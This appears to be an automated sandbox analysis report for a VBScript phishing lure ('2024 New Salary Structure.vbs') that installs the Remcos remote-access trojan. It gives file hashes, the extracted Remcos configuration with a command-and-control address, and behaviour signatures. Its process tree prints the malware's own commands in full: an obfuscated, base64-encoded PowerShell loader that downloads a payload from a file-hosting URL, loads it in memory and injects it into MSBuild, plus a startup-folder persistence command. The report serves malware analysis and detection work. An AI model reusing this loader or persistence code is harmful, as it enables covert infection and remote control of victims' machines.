Analysis
-
max time kernel
166s -
max time network
158s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
12-11-2024 07:51
Static task
static1
Behavioral task
behavioral1
Sample
2024 New Salary Structure.vbs
Resource
win7-20240729-en
General
-
Target
2024 New Salary Structure.vbs
-
Size
1KB
-
MD5
98dd05c55887724be8c28776218bad24
-
SHA1
b8939b327872d567398b5cd508b64f831e4d4883
-
SHA256
ae31154dbcca94d6ef4c0fc616d2935bb75124b4d554d3e681740986a21c1f3b
-
SHA512
a9c178f38fb232e2b1b8d36b177fe59e8d90803e3a72e7f902217ed521381539b9cc7ccdd367bf080920fe100b7bb1b7c3a203c68fe3cb7fbbf53132b0f31206
Malware Config
Extracted
https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f
https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f
Extracted
remcos
Final
104.243.246.120:2030
-
audio_folder
MicRecords
-
audio_path
ApplicationPath
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-4NJUM7
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Remcos family
-
Blocklisted process makes network request 4 IoCs
flow pid Process 4 4308 WScript.exe 6 4308 WScript.exe 32 2536 powershell.exe 34 2536 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
pid Process 464 powershell.exe 2536 powershell.exe 4812 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation WScript.exe -
Drops startup file 2 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CJJ.vbs WScript.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CJJ.vbs WScript.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2536 set thread context of 4232 2536 powershell.exe 110 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 4364 cmd.exe 1200 PING.EXE -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 1200 PING.EXE -
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 6 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 4 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 4812 powershell.exe 4812 powershell.exe 464 powershell.exe 464 powershell.exe 2536 powershell.exe 2536 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 4812 powershell.exe Token: SeDebugPrivilege 464 powershell.exe Token: SeDebugPrivilege 2536 powershell.exe -
Suspicious use of WriteProcessMemory 20 IoCs
description pid Process procid_target PID 4308 wrote to memory of 4364 4308 WScript.exe 86 PID 4308 wrote to memory of 4364 4308 WScript.exe 86 PID 4364 wrote to memory of 1200 4364 cmd.exe 88 PID 4364 wrote to memory of 1200 4364 cmd.exe 88 PID 4364 wrote to memory of 4812 4364 cmd.exe 105 PID 4364 wrote to memory of 4812 4364 cmd.exe 105 PID 4308 wrote to memory of 464 4308 WScript.exe 106 PID 4308 wrote to memory of 464 4308 WScript.exe 106 PID 464 wrote to memory of 2536 464 powershell.exe 108 PID 464 wrote to memory of 2536 464 powershell.exe 108 PID 2536 wrote to memory of 4232 2536 powershell.exe 110 PID 2536 wrote to memory of 4232 2536 powershell.exe 110 PID 2536 wrote to memory of 4232 2536 powershell.exe 110 PID 2536 wrote to memory of 4232 2536 powershell.exe 110 PID 2536 wrote to memory of 4232 2536 powershell.exe 110 PID 2536 wrote to memory of 4232 2536 powershell.exe 110 PID 2536 wrote to memory of 4232 2536 powershell.exe 110 PID 2536 wrote to memory of 4232 2536 powershell.exe 110 PID 2536 wrote to memory of 4232 2536 powershell.exe 110 PID 2536 wrote to memory of 4232 2536 powershell.exe 110
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\2024 New Salary Structure.vbs"1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Drops startup file
- Suspicious use of WriteProcessMemory
PID:4308 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\2024 New Salary Structure.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.JJC.vbs')')2⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:4364 -
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 103⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1200
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\2024 New Salary Structure.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.JJC.vbs')')3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4812
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdzakd6aW1hZ2VVcmwgPSBUVWlodHRwczovLzEwMTcuZmlsZW1haWwuY29tL2EnKydwaS9maWwnKydlL2dldD9maWxla2V5PTJBYV9iV285UmV1NDV0N0JVMWtWZ3MnKydkOXBUOXBnU1NsdlN0R3JuVElDZkZobVRLajNMQzZTUXRJY09jX1QzNXcmJysncGsnKydfdmlkPWZkNGY2MTRiYjIwOWM2MmMxNzMwOTQ1MTc2YTA5MDRmIFRVaTtzakd6d2ViQ2xpJysnZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtzakd6aW1hZ2VCeXRlcyA9IHNqR3p3ZWJDbGllbnQuJysnRG93bmxvYWREYXRhKHNqR3ppbWFnZVVybCk7c2pHemltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURicrJzguR2V0U3RyaW5nKHNqR3ppbWFnZUJ5dGVzKTtzakd6c3RhcnRGbGFnID0gVFVpPDxCQVNFNjRfU1RBUlQ+PlRVaTtzakd6ZW5kRmxhZyAnKyc9IFRVaTw8QkFTRTY0XycrJ0VORD4+VFVpO3NqR3pzdGFydEluZGV4ID0gc2pHemltJysnYWdlVGV4dC5JJysnbmRleE9mKHNqR3pzdGFydEZsYWcpO3NqR3plbmRJbmRleCA9IHNqRycrJ3ppbWFnZVRleHQuSW5kZXhPZihzakd6ZW5kRmxhZyk7c2pHenN0YXJ0SW5kZXgnKycgLWdlIDAgLWFuZCBzakd6ZW5kSW5kZXggLWd0IHNqR3pzdGEnKydydEluZGV4O3NqR3pzdGFydCcrJ0luZGV4ICs9ICcrJ3NqR3onKydzdGFydEZsYWcuTGVuZ3RoO3NqJysnR3piYXNlNjRMZW5ndGggPSBzakd6ZW5kSW5kZXggLSBzakd6c3RhcnRJbmRlJysneDtzakd6YmFzZTY0Q29tbWFuZCA9IHNqR3onKydpbWFnZVRleHQuU3Vic3RyaW5nKHNqR3pzdGFydEluZGV4LCBzakd6YmFzZTY0TGVuZ3RoKTtzakd6YmFzZTY0UmV2ZXJzJysnZWQgPSAtam9pJysnbiAoc2pHemJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBiVmh4IEYnKydvckVhY2gtT2JqZWN0IHsgc2pHel8gfSlbLTEuLi0oc2pHemJhc2U2NENvbW1hbmQuTGVuZ3RoKV07c2pHemNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OicrJ0Zyb21CYXMnKydlNjRTdHJpbmcocycrJ2pHemJhc2UnKyc2NFJldmVyc2VkKTtzakd6bG9hZGVkQXNzZW1ibHkgJysnPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKHNqR3pjb21tYW5kQnl0ZXMpO3NqR3p2YWlNZXRob2QgPSBbZG5saWIuSU8uSG8nKydtZV0uR2V0TWV0aG9kKFRVaVZBSScrJ1RVaSk7c2pHenZhaU1ldGhvZC5JbnZva2Uoc2pHem51bCcrJ2wsIEAoVFVpMC9ZRWVuTy9kLycrJ2VlLmV0c2FwLy86c3B0dGhUVWksJysnIFRVaWRlc2F0aXZhZG9UVWksIFRVaWRlc2F0aXZhZG9UVWksIFRVaWRlc2F0aXZhZG9UVWksIFRVaU1TQnVpbGRUVWksIFRVaWRlc2F0aXZhZG9UVWksIFRVaWRlc2F0aXZhZG9UVWksJysnVFVpZGVzYXRpdmFkJysnb1RVaSxUVWlkZXNhdGl2YWRvVCcrJ1VpLFRVaWRlc2F0aXZhZG9UVWksVFVpZGVzYXRpdmFkb1RVJysnaSwnKydUVWlkZXNhdGl2YWRvJysnVFVpLFQnKydVaTFUVWksVFVpZGVzYXRpdmFkb1RVaSkpOycpLnJlcExhY0UoKFtjSEFyXTExNStbY0hBcl0xMDYrW2NIQXJdNzErW2NIQXJdMTIyKSxbU3RyaU5nXVtjSEFyXTM2KS5yZXBMYWNFKChbY0hBcl05OCtbY0hBcl04NitbY0hBcl0xMDQrW2NIQXJdMTIwKSxbU3RyaU5nXVtjSEFyXTEyNCkucmVwTGFjRSgoW2NIQXJdODQrW2NIQXJdODUrW2NIQXJdMTA1KSxbU3RyaU5nXVtjSEFyXTM5KSB8IC4oICR2ZVJCb3NFUHJFRmVSRU5jRS5UT3NUcmlOZygpWzEsM10rJ3gnLUpvaW4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:464 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('sjGzimageUrl = TUihttps://1017.filemail.com/a'+'pi/fil'+'e/get?filekey=2Aa_bWo9Reu45t7BU1kVgs'+'d9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&'+'pk'+'_vid=fd4f614bb209c62c1730945176a0904f TUi;sjGzwebCli'+'ent = New-Object System.Net.WebClient;sjGzimageBytes = sjGzwebClient.'+'DownloadData(sjGzimageUrl);sjGzimageText = [System.Text.Encoding]::UTF'+'8.GetString(sjGzimageBytes);sjGzstartFlag = TUi<<BASE64_START>>TUi;sjGzendFlag '+'= TUi<<BASE64_'+'END>>TUi;sjGzstartIndex = sjGzim'+'ageText.I'+'ndexOf(sjGzstartFlag);sjGzendIndex = sjG'+'zimageText.IndexOf(sjGzendFlag);sjGzstartIndex'+' -ge 0 -and sjGzendIndex -gt sjGzsta'+'rtIndex;sjGzstart'+'Index += '+'sjGz'+'startFlag.Length;sj'+'Gzbase64Length = sjGzendIndex - sjGzstartInde'+'x;sjGzbase64Command = sjGz'+'imageText.Substring(sjGzstartIndex, sjGzbase64Length);sjGzbase64Revers'+'ed = -joi'+'n (sjGzbase64Command.ToCharArray() bVhx F'+'orEach-Object { sjGz_ })[-1..-(sjGzbase64Command.Length)];sjGzcommandBytes = [System.Convert]::'+'FromBas'+'e64String(s'+'jGzbase'+'64Reversed);sjGzloadedAssembly '+'= [System.Reflection.Assembly]::Load(sjGzcommandBytes);sjGzvaiMethod = [dnlib.IO.Ho'+'me].GetMethod(TUiVAI'+'TUi);sjGzvaiMethod.Invoke(sjGznul'+'l, @(TUi0/YEenO/d/'+'ee.etsap//:sptthTUi,'+' TUidesativadoTUi, TUidesativadoTUi, TUidesativadoTUi, TUiMSBuildTUi, TUidesativadoTUi, TUidesativadoTUi,'+'TUidesativad'+'oTUi,TUidesativadoT'+'Ui,TUidesativadoTUi,TUidesativadoTU'+'i,'+'TUidesativado'+'TUi,T'+'Ui1TUi,TUidesativadoTUi));').repLacE(([cHAr]115+[cHAr]106+[cHAr]71+[cHAr]122),[StriNg][cHAr]36).repLacE(([cHAr]98+[cHAr]86+[cHAr]104+[cHAr]120),[StriNg][cHAr]124).repLacE(([cHAr]84+[cHAr]85+[cHAr]105),[StriNg][cHAr]39) | .( $veRBosEPrEFeRENcE.TOsTriNg()[1,3]+'x'-Join'')"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2536 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵
- System Location Discovery: System Language Discovery
PID:4232
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
944B
MD5d28a889fd956d5cb3accfbaf1143eb6f
SHA1157ba54b365341f8ff06707d996b3635da8446f7
SHA25621e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45
SHA5120b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c
-
Filesize
64B
MD5af68b27c2533d96e25354bcd1d978b7b
SHA1befcdccec350ecfd9aa44ed059b2519a1d12f772
SHA256962b9a6b79499895af25b8cafebf94796b838cf2e46b75685d45eeb68ede199e
SHA512dbedd798f62badbcc4dadf41efdf646d749da881e660392959b31ffb9868cd43e72c65320c26217eee76446025acfa7e835e7053ff4a925d9394f47ef252bb0d
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82